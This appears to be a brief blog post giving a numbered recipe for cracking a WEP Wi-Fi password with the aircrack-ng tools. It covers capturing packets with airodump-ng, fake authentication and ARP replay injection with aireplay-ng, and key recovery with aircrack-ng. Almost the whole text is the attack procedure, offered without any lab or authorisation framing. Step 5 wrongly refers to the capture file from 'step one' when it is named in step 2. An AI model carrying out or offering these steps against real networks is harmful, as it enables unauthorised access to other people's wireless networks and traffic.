Hacking wep wifi password

Open terminal type:

1. airodump-ng wlan0
2. airodump-ng -c (channel of network) -w (name of file to be used in last step) –bssid (bssid) mon0
3. new terminal: aireplay-ng -1 0 -a (bssid) -e (networkname essid) mon0
4. new terminal: aireplay-ng -3 -b (bssid) mon0
5: new terminal: aircrack-ng -b (bssid) (filename u used in step one)-01.cap
to take network adapter out of monitor mode
sudo -s
enter pass
airmon-ng stop mon0
airmon-ng stop wlan0

Leave a comment